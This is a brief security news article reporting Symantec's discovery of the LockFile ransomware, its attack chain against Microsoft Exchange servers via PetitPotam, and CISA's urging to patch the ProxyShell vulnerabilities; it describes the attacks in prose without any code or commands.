Security researchers claim to have discovered a new ransomware family called LockFile that may have been used to attack Microsoft Exchange servers in the US and Asia. The LockFile ransomware was first observed on the network of a US financial organisation on July 20, with its latest activity seen as recently as August 20.
According to Symantec, it has found the ransomware has hit at least 10 companies within a single month. The company said the attackers used the incompletely patched PetitPotam vulnerability to gain access to the domain controller, and then spread across the network. It is not clear how the attackers gain initial access to the Microsoft Exchange Servers.
Attack Chain
Exchange servers are compromised through an as yet unidentified technique, by executing PowerShell command. Other powershell wget commands to the same IP address use similar seemingly random high port numbers. It is unknown exactly what is downloaded by the PowerShell command; however, the attackers maintain access on victim networks for at least several days before beginning the ransomware attack.
As per US Cybersecurity and Infrastructure Security Agency, “Malicious cyber actors are actively exploiting the following ProxyShell vulnerabilities: CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207. An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine. CISA strongly urges organisations to identify vulnerable systems on their networks and immediately apply Microsoft’s Security Update from May 2021—which remediates all three ProxyShell vulnerabilities.”
LockFile appears to be a new threat on the already crowded ransomware landscape. The investigation into this threat, and whether it may have links to any previously seen or retired ransomware threats continues. The company has also noted file and network based protections.